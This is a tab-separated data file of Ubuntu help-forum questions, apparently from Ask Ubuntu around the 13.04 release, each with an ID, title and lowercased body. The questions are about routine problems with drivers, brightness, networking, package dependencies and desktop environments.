287558	why does lmms depend on wine ?	i was uninstalling wine , and i saw that it also uninstalled lmms at the same time . thinking it was just something weird that happened , i went and tried lmms - naturally , it did n't start , saying it was uninstalled . so i tried sudo apt-get install lmms , and it listed wine1.4 as a package to be installed . why does lmms need wine to run ? it seems kind of counterintuitive/silly that linux multimedia studio needs to be run as if it were made for windows , not linux . edit : my system is fully updated , and here 's a picture of my terminal output when i try to install lmms . note that all the other components , as listed by uri , are installed completely : i also tried sudo apt-get -f install , sudo apt-get clean and sudo apt-get autoclean , and none of those helped .
287562	system resume from suspend after 13.04 upgrade	my system always was able to suspend and resume properly under 12.10 and 12.04 and earlier , but immediately after the 13.04 upgrade , i find it crashes on trying to return from suspend . sometimes it just repaints part of the screen with a bit of the startup/splash graphic then halts , and sometimes it gets a bit further , blanking the screen and showing a mouse pointer - which is frozen . hardware is a amd phenom ( tm ) ii x4 945 processor ă 4 on an nvidia motherboard , 8gb ram , geforce gtx 550 ti/pcie/sse2/3dnow ! , running ubuntu 13.04 32 bit . ca n't find anything that seems relevant in the system log - maybe i do n't know what to look for though , even which log . i will post anything requested .
287564	ubuntu server randomly gets dhcp address instead of keeping static ip	i have a home server set up as my internet gateway . ip fowarding and such is working fine , but for some reason the server keeps grabbing a dhcp address instead of sticking with the static address i have set up in /etc/network/interfaces . eth1 keeps switching over to a dhcp address ( sort of oddly.. assigned by the dhcp server running on itself ) . my first thought was network manager , but it does n't seem to be installed . here 's my interfaces file : # the loopback network interface auto lo iface lo inet loopback # external interface to the outside world auto eth0 iface eth0 inet dhcp pre-up iptables-restore < /etc/iptables.rules # our local network , we 're the dhcp server auto eth1 iface eth1 inet static address 192.168.1.1 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 are there any other utilities installed by default that might be resetting the network interface ?
287565	evolution setup	i ca n't access my email with evolution . there is nowhere to enter the isp password in the setup procedure , only a note to say that the password will be asked for at first login . but there is no first login with no password . there must be a simple explanation , i 'd be grateful for any help .
287569	i just lost /var/lib/dpkg	i have an empty /var/lib/dpkg and as consequence both apt and dpkg are starting to complain about everything and with every simple task i would like to do with them : there is a way to rebuild that directory ? i simply got this directory deleted ... do n't ask why , it 's something too `` experimental '' that i should not have try .
287571	desktop shows a white or black background instead of wallpapers	after upgrade from 12.10 to 13.04 my desktop background turn black after i try to set a image for that . how to fix it ? this is my desktop screen .
287572	unable to adjust brightness in ubuntu/xubuntu/lubuntu13.04	i 've recently upgraded to xubuntu 13.04 and noticed that i 'm unable to use the brightness keys to adjust the brightness of my screen . i 've tried just about everything this thread suggest and i 'm still unable to find a solution . if it helps at all i 'm using an asus eeepc 1025c . thanks for your time .
287574	how do i set ctrl+e to be `` end of line '' ?	i have recently gotten a system 76 gazelle lap top with ubuntu 12.10 . so far a i very happy except with one feature . i am use to ctrl+e for end of line . ctrl+a for beginning of line . these work on the bash shell command , but not on other applications such as , sublime text 2 gedit , and in a search window on firefox . ( in these ctrl-a seems to `` select all '' and `` ctrl-e '' does no seem to do anything ) . since this occurs in several applications i assume that some global setting is involved . ( what thats the place of these is `` end '' and `` home '' on the keypad . ) i use sublime text 2 on anther machine and having these differing key bindings is making me a bit nuts . i know `` set -o vi '' and `` set -o emacs '' set the keyboard bindings in the bash shell and am assuming that there is on a line or two of code that is read upon startup that will fix this . can anyone offer advice ? and i apologize if this has been answered before , but was not able to find the answer online . best wishes , ralph howard
287576	team fortress blue screen and random color pixels ( 13.4 )	i 'm trying to run team frotress 2 on my laptop . i have intel integrated card ( about dialog says : intel速 ironlake mobile x86/mmx/sse2 ) and i3 processor . i have 13.04 and latests drivers . here 's a screen shot of when i run it ( windowed or regular its the same . ) i have tried to play tf2 on elementaryos ( based on 12.04 ) and it was the same problem . can i run it ?
287578	booting into recovery mode = fail	the story so far ... several weeks ago 12.04 crashed while i was on the interweb . now when i boot , it asks me for a password to log in . i can log in as a guest , but of course all my files and documents are inaccessible to the guest . i have followed the instructions on the wiki.ubuntu.com/recoverymode , but at step 7 there is no message saying `` drop to root shell prompt '' . instead it reads : '' root @ clayton-desktop : ~ # [ 29.606190 ] tda10048_firmware_upload : upload failed . ( file not found ? ) '' and there is a flashing cursor below . any thoughts ? clayton p.s . even though i have been using ubuntu hassle free for many years , i am quite ict challenged .
287581	the terminal window auto closes after a while	i 've been experiencing some weird behavior with my gnome-terminal . when i open it , without executing any script , just from the unity dash it closes itself after about 10 minutes . regardless if i did anything with it , like git command or executing bash scripts or i just cd into my downloads directory something i thing is important to mention : i am using the ultimate bashrc file , although i 've been using it for a long time and this is the first time i 've had any problems . i added some changes on my own and i also read the whole thing . did not see anything that can make the window close on itself ubuntu 12.10 with unity
287582	ubuntu 13.04 mouse and trackpad unresponsive	i have finally fixed my installation problem but now the trackpad and the mouse is unresponsive . on try ubuntu they work just fine . how do i fix this ? my laptop is the hp pavilion g6 2269wm i am using a usb mouse from inland and the model number is : 296335 . it was pre-installed with windows 8 , when i installed 13.04 it had 12.10 on it .
287584	i can not open any gui application after do 'apt-get remove gnome* ' - what can i do ?	every time i run ui applications like firefox or chrome or qtoctave etc i get these gtk warning : ( firefox:27271 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( firefox:27271 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( firefox:27271 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( firefox:27271 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( firefox:27271 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( firefox:27271 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( firefox:27271 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( firefox:27271 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( firefox:27271 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( firefox:27271 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ** ( firefox:27271 ) : warning ** : failed to open webapp application path dir /usr/share/gnome-fallback/unity-webapps/userscripts : error opening directory '/usr/share/gnome-fallback/unity-webapps/userscripts ' : no such file or directory ** ( firefox:27271 ) : warning ** : failed to open webapp application path dir /usr/share/gnome/unity-webapps/userscripts : error opening directory '/usr/share/gnome/unity-webapps/userscripts ' : no such file or directory ** ( firefox:27271 ) : warning ** : failed to open webapp application path dir /usr/local/share/unity-webapps/userscripts : error opening directory '/usr/local/share/unity-webapps/userscripts ' : no such file or directory ** ( firefox:27271 ) : warning ** : failed to open webapp application path dir /usr/share/unity-webapps/userscripts : error opening directory '/usr/share/unity-webapps/userscripts ' : no such file or directory i am guessing this is because i once accidentally did sudo apt-get remove gnome* . but i do n't know how to resolve this . can anyone please help me resolve this ?
287588	ubuntu 13.04 brightness problem on laptop	i have installed ubuntu 13.04 and the proprietary amd catalyst driver 13.4 . after installing the driver , the brightness of the screen has turned to the lowest and can not be changed . no matter how i scrolled the brightness bar , the brightness does n't change . i tried editing grub with acpi_backlight=vendor . but , it did n't work and the brightness hotkeys stopped working . note that ubuntu 12.04 works perfectly without a single issue . what can i do to solve the problem in ubuntu 13.04 ?
287589	unable to change the brightness on my dell xps 15 ( l502x )	i am using ubuntu 13.04 and i am unable to change the brightness on my laptop and need a bit a help .
287591	ubuntu 12.04 will not connect to school wifi ?	i am new to ubuntu . my wireless card is a intel corporation centrino advanced-n + wimax 6250 ( rev 57 ) . it will connect fine at my house , but not at school and some other places . the networks which i can not connect to are wpa/wpa2 personal and wpa/wpa2 enterprise .
287594	printer driver for canon mx452	does anyone know how i can get my canon pixma mx452 running on ubuntu 13.04 , either via usb or 802.11 ? i tried to install in 13.04 via usb , but it used a generic text-only driver which did n't work at all . no scanner functionality either . thanks in advance !
287600	thumbnails ( nautilus previews ) for `` basic '' ( xpm , png , bmp , gif ) image files	nautilus was not generating thumbnails for some xpm files i had , so i tried to investigate who was responsible for generating thumbnails for xpm files ( if any ) , or any image for that matter . and i stumbled into a wall of misinformation , obsolete specs and frustrated searches . so , where is the thumbnailer for such `` basic '' images defined ? i 've checked /usr/share/thumbnailers and it only mentions pdf , exe , and video files . no mention of png , jpg bmp , etc . where are thumbnails of images defined ? wat are the official references about it ?
287603	no more scroll wheel scrolling along the sidebar in 13.04 ?	just upgraded to 13 , and one thing that i have immediately noticed it lacking is scrolling via the mouse scroll wheel through icons stored in the sidebar . this was my primary way of getting up and down the sidebar through icons i 've stored there , and now it no longer works . great . is this something that can be fixed or what ? if so then how ?
287605	which version of ubuntu should i use to begin my contribution in packaging ?	i follow the motu 's guide about packaging , there is a note that advice to do the packaging work in the current development version ( i 'm running 13.04 ) and to use a vm . i do n't know exactly which is the current development version . should i use 13.04 ? thanks
287606	fontconfig-infinality causes 13.04 boot failure	i upgraded my travel notebook ( asus vivobook x202e 11.6 '' touch screen , but minimal video , 1366x768 as i recall ) from ubuntu 12.10 to ubuntu 13.04 . everything worked perfectly , but then i thought i would make some minor enhancements . did : sudo add-apt-repository ppa : no1wantdthisname/ppa sudo apt-get update sudo apt-get upgrade sudo apt-get install fontconfig-infinality no install errors . rebooted no mouse cursor dialog box gives options to run in low resolution neither keyboard or mouse does anything there are no other ( i.e . linux , win8 or win7 boot partitions on this netbook ) booted with a 12.10 install usb , tried to remove fontconfig-infinality , but it seems not to be installed ( guess all it showed was packages loaded from the usb ) i need a way to 'get in ' and undo the effects of `` sudo apt-get install fontconfig-infinality ''
287610	can not select desktop environments at login session	i cliked the weel at right top it showed number of de when i cliked with mouse nothing is happining as a result i can not use lxde pla.. help me
287621	ubuntu 13.04 bottom taskbar	what is the new task bar at the bottom of the screen in ubuntu 13.04 it hangs the system while its up and how do i get rid of it ?
287623	is there a way to capture and replay network traffic on demand ?	for places with annoying captive portals that you have to log into every day , is there a way to capture and replay traffic ( for the login page ) when connected to a specific wifi network ? edit : i have figured out how to bypass the captive portal that annoys me every day with a greasemonkey script : // ==userscript== // @ name wifi-autologin // @ namespace lakdsjf-ns // @ description hopefully autologins to a wifi network // @ include https : //1.1.1.1/* // @ include http : //1.1.1.1/* // @ version 1 // @ run-at document-end // ==/userscript== console.log ( 'loaded ' ) ; window.addeventlistener ( 'load ' , submitaction ) ;
287624	ssh to the ubuntu host machine from a ubuntu virtualbox guest ?	i would like to ssh into my host ( kubuntu 12.04 64 bit ) machine from a virtualbox guest running ubuntu 12.04 32 bit . the host has the latest virtualbox from the ubuntu repos ( 4.1.12 ) . the guest was a preconfigured vm i downloaded from virtualboximages.com . the problem is that my sshd_config does not allow login except with pubkeyauthentication and i need to be able to use passwordauthentication from this virtualbox guest ( for reasons that are probably outside the scope of this question ) . my /etc/ssh/sshd_config file probably needs to look like this : passwordauthentication no match address 192.168.56.0/24 passwordauthentication yes when i add the match block to sshd_config , ssh terminates with a message like this : init : ssh main process ( 7352 ) terminated with status 255 why ? what am i doing wrong ? i have used match blocks almost identical to that in the past , so i 'm baffled . this question is relevant but it did n't help me : how can i allow ssh password authentication from only certain ip addresses ? i can guess my issue might be related to the virtualbox network interface ... in virtualbox i 'm using `` host only '' for adapter 1 ( with the default vboxnet0 ) . with this , the host has an interface vboxnet0 with ip 192.168.56.1 . that 's the reason for my match block ip address above . ( i also set up adapter 2 as `` nat '' so my guest can have outside internet access ) . for testing i set promiscuous mode to `` allow all . '' i can ping both ways . and i can ssh from the host to the guest ( the opposite way of the connection i want ) . the host runs denyhosts , but while testing i stopped that service .
287627	how to find a new hdd	i have only shell access to a machine ( i 'm remote and i ssh in ) but i can sudo . i am told by someone on-site that he has added a hard disk drive to the machine . i need to mount it ( which i know how to do ) , but first i need to find it . i know nothing more . how do i find it ? where is it ? and if there 's more than one hdd there ( wherever i 'm finding this unmounted drive ) , then how do i know which is the new one ?
287628	which is the correct iso file to download ubuntu 13.04 on a laptop with an intel core i5 processor ?	the ubuntu website automatically downloads an iso file with the -amd64.iso suffix . i see no option to download one for an intel processor . i do n't know if it even matters or if this -amd64.iso is universal for all computers . i have a lenovo p500 with windows 8 and i 'm trying to create a bootable usb stick . i followed the instructions on http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows and pen drive linux has 2 options for the iso file download . it has the -amd64.iso and an -i83.iso file . i downloaded the -i83 but i 'm not sure if i was supposed to download the other one since the main website only downloads -amd64 . can someone please clarify ? help is appreciated , thanks .
287633	13.04 takes extremely long to establish wired connection	i 'm currently using ubuntu 13.04 in my campus dorm ( dhcp . ) it takes quite a long time to establish a wired connection ( about 1 min . ) but once connected , it 's as fast as in windows . i did a lot of search and still have no idea . thanks
287635	unable to find new release ( after interuppting a release upgrade )	i am on 12.10 and had to interrupt a 'do-release-upgrade ' to 13.10 now , later , when i run 'do-release-upgrade ; , it reports back as 'unable to find new release' can someone help out ?
287642	i ca n't install ubuntu 13.04 alongside windows 7	i download ubuntu-13.04-desktop-amd64.iso and write on a dvd then check it with a md5 checker and it 's ok . i decide to install ubuntu on my pc that have windows 7 sp1 64-bit simultaneously . i follow this manual from ubuntu website . in step 4 when i choose `` install ubuntu alongside windows 7 '' and click continue my screen turn black and dvd would be ejected and when i press enter the system would be restarted . also in windows i ca n't use wubi , when i run wubi with administrator permission it show nothing , i try wubi.exe -- force-wubi and did nothing . i have this problem with ubuntu 12.04.2 . my laptop specification : asus n53sv cpu : intel corei7 2630qm ram : 4.00 gb graphic card : nvidia geforce gt 540m & intel hd graphic family
287647	ubuntu 12.04 not usable after updating	update manager said there were updates so i applied them on or about april 25 , 2013 . during the process , the screen went blank . i thought it was just the screen saver , so i waited some time . when i went to check on it , there was no response to the keyboard or mouse ; after waiting even longer , i pressed the system reset . ubuntu restarted , but the screen resolution had changed . i went ahead and started update manager again , and this time it completed and said i needed to restart the system . during the restart process , the screen again went blank , and i waited for some time before pressing the reset button . after that , when ubuntu started , it took me to a command prompt full screen with a grub > prompt . can i get ubuntu back without reinstalling the system ? thanks ! additional info : single hard drive ( 320gb ) , dual boot : os/2 boot manager boots to either ecomstation 2.1 ( works ) and ubuntu ( worked before ; after update problem now i get the grub > prompt ) . booted with ubuntu 12.04 cd and that works . however , can not mount ubuntu partition ( ext3 ( version 1.0 ) ) using disk utility : error mounting volume details error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sda6 , missing codepage or helper program , or other error looked for boot-repair under dash home and ubuntu software center , but could not find it . should i be looking elsewhere or for a different name ?
287651	ubuntu 13.04 how i get menu options like win* ?	i am very new to linux , trying to replace windows 7 with a flavor of linux , two of my cyber frieds advised me to get ubuntu . i got it ( 13.04 gnome ) and burnt on usb , boot from usb and have a very nice and clean desktop . on left side i saw some icons to run specific applications and setting etc . but what about more applications / utilities which i assume to access from a start menu like option as in win* and in some ( scrren shots shows ) other linux flavors . how i can access all it has ? please help me to avoid using windows . thanks and best regards .
287652	what application will give me a calendar with a year view ?	most applications have month or week or agenda view but i 'm looking for something that can give me a one year spread . tia
287658	what unity lenses and scopes are available to add ?	i am curious to know what sort of unity scopes can we add in ubuntu 13.04 . i have tried a youtube lens but it does n't work . are there any scopes/lenses ( except the default ones ) i can add to the unity dash ?
287662	install different raid	now i have running server ( samba ) ubuntu 12 with raid 1 ( 2x250gb ) . it 's running well , but i will add new hardisk 2x ( 1tb ) . i would like to know this new hardisk will be running raid 1 too . is it possible install raid 1 , on raid 1 running system ?
287663	no sound coming from asus laptop speaker and headphone with the version 12.04 and 13.04	i have a asus laptop that used to run on windows xp , but now , no sound coming from the speaker and the headphones with the version 12.04 and 13.04
287664	google chrome crashing when start download	i got a strange problem with ubuntu 13.04 and google-chrome google chrome keeps crashing when i download something . and i ca n't see detailed chrome log because chrome : //crashes/ is disabled and it also crashing when i go to settings section on google-hrome here is my crash log on /var/log/syslog kernel : [ 11860.628097 ] chrome [ 3352 ] : segfault at 8 ip 00007fd8552b3f14 sp 00007fffa7e510a0 error 4 in chrome [ 7fd85426a000+519e000 ] google-chrome version : 26.0.1410.63 ubuntu : 13.04 also i tried to disable all my plugins from chrome : //extensions/ , thanks
287668	nodes.org install sur local src node	i am installing nodes the command sudo ./configure is ok but when i type next command menudo make i got an error g++ and 127 . how could i resolve them to finish the nodes installation
287669	minimum and maximum cpu frequency are equal	i just noticed my laptop stared working considerably slower . i am using an updated 13.04 , though the issue did not start right after the upgrade . after tracking down the issue i noticed that both processors operate at 800 mhz instead of the maximum 1800 mhz . irrespective of the load , the frequency remains 800 . here are some stats : $ cpufreq-info cpufrequtils 008 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : driver : powernow-k8 cpus which run at the same hardware frequency : 0 1 cpus which need to have their frequency coordinated by software : 0 1 maximum transition latency : 109 us . hardware limits : 800 mhz - 1.80 ghz available frequency steps : 1.80 ghz , 1.60 ghz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 800 mhz . the governor `` performance '' may decide which speed to use within this range . current cpu frequency is 800 mhz . cpufreq stats : 1.80 ghz:0.00 % , 1.60 ghz:0.00 % , 800 mhz:100.00 % analyzing cpu 1 : driver : powernow-k8 cpus which run at the same hardware frequency : 0 1 cpus which need to have their frequency coordinated by software : 0 1 maximum transition latency : 109 us . hardware limits : 800 mhz - 1.80 ghz available frequency steps : 1.80 ghz , 1.60 ghz , 800 mhz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 800 mhz and 800 mhz . the governor `` performance '' may decide which speed to use within this range . current cpu frequency is 800 mhz . cpufreq stats : 1.80 ghz:0.00 % , 1.60 ghz:0.00 % , 800 mhz:100.00 % note the `` current policy '' says the frequency is between 800 and 800 irrespective of the hardware limits . the original governor was `` ondemand '' , so i changed it to `` performance '' in order to see if that makes a difference which it did n't . no amount of invoking cpufreq-set or cpufreq-selector changes the frequency . looking around , i noticed several people reported similar issues in the past though no favorable answer exists . any help would be greatly appreciated .
287676	can i update kernel of 12.04 to 3.5 of 12.04.2 ?	kernel in 12.04.2 is 3.5 . my kernel in 12.04 amd64 is 3.2.0-40 . can i update kernel of 12.04 to 3.5 of 12.04.2 ? lts hardware enablement stack says : the hardware enablement stack is only intended for use on x86 hardware at this time . does this include amd64 ? thanks
287679	upgrade to 13.04 from 12.10	i am trying to upgrade from version 12.10 to 13.04 and when i open my software updater it tells me to failed to download repository information . check your internet connection . . so i closed it , opened up firefox . my internet is working just fine . i even rebooted and tried again a couple of times . it still says to check your internet connection . i also trued disconnecting and reconnecting my internet , rebooting the modem . still nothing . any advice ? when i click details , the following shows up : w : gpg error : http : //security.ubuntu.com quantal-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > , w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms , e : some index files failed to download . they have been ignored , or old ones used instead .
287686	how to prevent executing update-notifier without uninstalling	presence of update-notifier is annoying . i do n't like to remove update-notifier ; i just want to disable it . or just prevent it from execution . i tried this by removing it from panel in dconf-editor and configuration editor . nothing helped me .
287688	laptop overheating , unity / opengl / nvidia drivers conflict	my problem is that my laptop , dell inspiron n5110 , running ubuntu 12.04 , is overheating , and occasionally shuts down voluntarily . the fan is working non-stop . i know much has been reported/asked/answered about problems similar to mine , but i 've been reading and experimenting with solutions suggested for days now , and none of them helped . my current diagnostic is that : when not using nvidia-current , the laptop overheats and shuts down very often . when using nvidia-current , i think the overheating problem gets better , but unity falls back to unity-2d ( xlib : extension `` glx '' missing on display `` :0.0 '' . error : glx is not available on the system ) , which i dislike . all the answers i found about the opengl/unity problem involve getting rid of the nvidia drivers . other notes : the fan is working non-stop . afaict , this is n't a fan-hardware problem . as suggested in many places , i 'm using pcie_aspm=force in my /etc/default/grub . it does n't seem to make a difference . the only way i found to prevent my laptop from shutting down too often , is by using jupiter , and setting its mode to performance - > power saving . obviously , this sucks . it stills shuts down occasionally , tough . i 'm currently using ubuntu 12.04 and kernel 3.2.0-40-generic . i had the same problems with ubuntu 11.10 / kernel 3.0 . additional command output % lspci| grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev a1 )
287690	why there is .desktop file in new unity based ubuntu os ?	i could find .desktop files in unity based ubuntu . can anyone explain it simply ?
287698	xbmc is slow and sluggish in ubuntu 13.04 ; how can i speed it up ?	i have a zotac zbox id84 with intel d2550 proc and nvidia gt520m gpu , 2gb memory and 320gb hard disk . i tried xbmcbuntu first and it ran perfectly for a few months until i started to mess around with the terminal . after a re-install i could get the hdmi sound to work again so i installed the latest version of ubuntu ( 13.04 ) instead . that worked fine . the sound and everything worked right away , but the interface of ubuntu is sluggish and xbmc does n't run as good as it did in xbmcbuntu . the video playback is slow and it stutters . it speeds up and slows down with the complexity of the video . so , the pc is more than capable to run xbmc and play the videos , but something in ubuntu ( gui ? ) slows it down to an unusable pace . can anybody tell me what i can do to speed things up ? since i 'm new to ubuntu i have no clue where to start looking .
287703	drivers corrupted after update for first time ?	i had dual booted ubuntu 12.10 with windows 7 on my laptop . after installing i observed that the fan was on all the time , resulting in huge electricity usage . there was an alert that i had ~200 updates . so i installed them . when i restarted my laptop , there ws grub . but when booted ubuntu , it stayed blank & could not load ubuntu . so i again restarted my laptop & booted something like `` ubuntu safe mode '' which was showed on grub . so it started showing all the drivers that were loading . and suddenly it hanged at a spot . it didnt show any error or such thing . but i think the drivers got corrupted . why was the fan always the first time , even though i had not installed any updates or anything ? so , why might have this ( drivers getting corrupted after update ) happened ? is there a way to repair ubuntu or do i have to re-install it ?
287704	unable to install skype in ubuntu 13.04 on hp envy 17	i have a hp envy 17 3d notebook on which i installed ubuntu 13.04 today ( replaced the windows 7 at installation ) . after ubuntu installation , i started downloading & installing software from ubuntu software center . i could n't find skype in ubuntu software center , so i went to skype.com and started downloading from there . after downloading , it showed up in ubuntu software center and i clicked install . after some time the skype icon shows up in dash , but the application does n't launch . please help me . i 'm new to ubuntu .
287710	what is the number after the index in terminal ?	after typing for example , firefox & or xpad & in terminal , the echoed output looks like [ number of background programs running ] < an unknown number > what does that unknown number signify ? except that they are always increasing , they do not seem to follow any particular order , are they some kind of time indicators ?
287713	wubi for win 8 and uefi bios	when will canonical come out with a version of ubuntu for win 8 and uefi ? i really do n't want to create a new partition . a wubi version would be fine .
287715	why do my gnome shell icons on the bar replicate and how can i stop it ?	why do my gnome shell icons on the right hand side of the top bar replicate themselves and what can i do to stop it ? on first start up there is the normal single set of icons but after hibernating the icons on the right double up . i have posted links to images to show this , i do n't have 10 reps to post images . it resets itself on 'alt+f2 ' and then 'r ' to reload the shell . before : after : thanks in advance .
287716	how to change menu entries in appindicator , when it is running ?	there is a similar question at stackoverflow , but it did n't help me : changing items while running . i tried asking at stackoverflow , but people there where not too active : how to change gtk menu in unity indicator applet ? . the problem is , if i define the changing function outside of gtk.main ( ) , it would be never executed , and inside it would be executed just once . if i make an infinite loop inside , gtk.main ( ) would be never executed . this is my code ( modified standard example ) . # ! /usr/bin/env python import sys from gi.repository import gtk , gdk from gi.repository import appindicator3 as appindicator if __name__ == `` __main__ '' : ind = appindicator.indicator.new ( `` example-simple-client '' , `` indicator-messages '' , appindicator.indicatorcategory.application_status ) ind.set_status ( appindicator.indicatorstatus.active ) ind.set_attention_icon ( `` indicator-messages-new '' ) menu = gtk.menu ( ) menu_quit = gtk.menuitem ( 'quit ' ) def add_item ( menu , label ) : menu.append ( menuitem ( label ) ) menu.append ( menu_quit ) def quit_app ( w ) : sys.exit ( 0 ) menu_quit.connect ( 'activate ' , quit_app ) menu_quit.show ( ) ind.set_menu ( menu ) gtk.main ( ) where do i put adding new menu items ( or changing existing ) in the code ? i am a real newbie in gui programming ...
287719	after upgrade to 13.04 unity dash have this blur on my netbook how do i fix it ?	after i upgraded to raring i am experiencing this sort of bug on my unity dash and it 's very annoying i searched the web and i ca n't find anything . and if i re-size the dash its still the same . my net book is a hp mini 110 .
287720	how to select the output device for system sounds in pulseaudio ?	in the playback tab in pavucontrol i can set the output device to use for each application but not for the `` system sounds '' . i have 2 active soundcards , one for my speaker and one for my headphones . if both are enabled system sounds are played in my headphones and if i disable the headphones the sound is played in the speakers . my `` speaker '' output device is already set as the default/fallback device . is there any way to change so that system sounds always play on the output device connected to my speakers ?
287723	how do i replace/quit unity in ubuntu 13.04 ?	i am trying out ubuntu 13.04 and the only thing that prevents me from completely switching is xbmc . i am running xbmc from the wsnipex ppa which is compiled with xvba support . xbmc does n't like unity that much and if started normally , it is very unresponsive ( see also this question ) and will not be able to use hardware decoding . a solution in ubuntu 12.04 is to use the following script to start xbmc : # ! /bin/bash metacity -- replace & sleep 2s xbmc unity -- replace & exit ; it replaces unity by metacity and this solves all my problems , however in ubuntu 13.04 metacity is ditched , so i would like to know how i can replace/quit unity there . ( starting xbmc standalone from the login screen lets me use hardware decoding but it is still a bit unresponsive , much slower than the above script for ubuntu 12.04 )
287725	running ubuntu off usb 3.0 flash drive	what is the minimal size usb 3.0 flash drive that i would need to run ubuntu . would it be as fast as running it of the hard drive ? would it have access to all of my laptops facilities ? i am thinking of investing in a 64 gb usb 3.0 flash drive to run ubuntu off rather than bothering with a separate partition > does this make sense ?
287729	radeon hd6450 does n't work under ubuntu 12.04 server	hardware : hp proliant microserver n40l os : ubuntu server 12.04 ( lsb_release gives ubuntu 12.04.2 lts , to be precise ) graphics card : xfx radeon hd 6450 ( http : //www.ebuyer.com/272721-xfx-hd-6450-1gb-ddr3-dvi-hdmi-low-profile-graphics-card-hd-645x-znh2 ) so this microserver has been running ubuntu fine for about six months . however , i recently bought the graphics card above with the intention of running xbmc via an hdmi cable to the tv . the card appears to work in the sense that the splash/post screens appear fine on the tv , and i can log in on there . lshw -c video gives *-display description : vga compatible controller product : caicos [ radeon hd 6450 ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:18 memory : d0000000-dfffffff memory : fe8e0000-fe8fffff ioport : e000 ( size=256 ) memory : fe8c0000-fe8dffff this implies the card is detected appropriately . however , i ca n't run anything graphical on there , and xbmc refuses to start . in terms of drivers , i 've tried following the instructions here what is the correct way to install ati catalyst video drivers ( fglrx ) ? and have tried : -using the default 'radeon ' driver ( i.e . without changing any repositories or installing any additional drivers ) - using the fglrx driver in the repositories - using the fglrx-experimental-9 driver - adding the xorg-edgers ppa and installing that way - directly downloadingd drivers from amd ; have tried versions 13.1 , 12.4 , and 11.12 ( obviously not accepting the fglrx upgrades on the last version ) none work . fglrxinfo and glxinfo both give error : unable to open display ( null ) while sudo lspci | grep vga gives 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati caicos [ radeon hd 6450 ] i ca n't actually figure out what 's going on , chiefly because while there are suggestions from other hp products that installing > 4gb of ram means certain cards , wo n't work ( e.g . http : //h30499.www3.hp.com/t5/proliant-servers-ml-dl-sl/ml150-g5-possible-bios-bug-with-add-on-pcie-video-card/td-p/4242397 # .uigfd8vuzwk ) , plenty of people seem to be using this card , this os , and this box without problems . looking through here , this question unity interface issues with amd radeon 6450 suggests other people have had trouble with this card on ubuntu , but it seemed to be fixed by installing a proprietary driver ( which i 've tried ) . this question does hd 6450 graphics card work fine on ubuntu ? suggests problems with hdmi , but i have also tried using the dvi output with an adapter ( as the tv only has a vga input ) without success . my next steps are probably : ( 1 ) try taking the ram down to 4gb and see if that works given the problems with other hp boxes above ( 2 ) try running ubuntu desktop from the livecd/usb and see if it can pick up the drivers however , any other help would be really gratefully received , and obviously happy to post any other info if that would help solve the problem . thanks !
287730	is it safe to downgrade libgl1-mesa-glx ?	i am trying to install qt-sdk but get the following error : the following packages have unmet dependencies : qt-sdk : depends : libqt4-opengl-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . i was able to find the package in question : libgl1-mesa-dev : depends : libgl1-mesa-glx ( = 9.1.1-0ubuntu3 ) but 9.2.0~git20130216.dd599188-0ubuntu0sarvatt~quantal is to be installed when i open synaptic package manager and try to downgrade the package it tells me that several other packages will be removed . some of these packages seem important and i am not sure if downgrading is a good idea . i am running ubuntu 13.04 after upgrading from 12.10 . i had the same issue with 12.10 and was hoping that an upgrade would solve it . so how to fix this ?
287733	stop windows 8 from running in background	i have installed ubuntu 12.04 lts on my windows 8 pc using wubi . though i choose to boot with ubuntu os , win 8 still runs in background . is there any way to shut win 8 completely ?
287734	how to create a link file with custom picture ?	while sharing some software it 's a good idea to include a link file ( address launcher of home page ) . a file without an image is not eye catchable . how to create a link file with a custom image as icon ?
287745	asking on using apt to install packages	i 'm new to using ubuntu or any linux distro . on reading and watching tutorials on the internet , i 've seen others just use sudo apt-get install package-name while others do these commands before using sudo apt-get install sudo add-apt-repository ( commands here ) what 's the better way to install packages ?
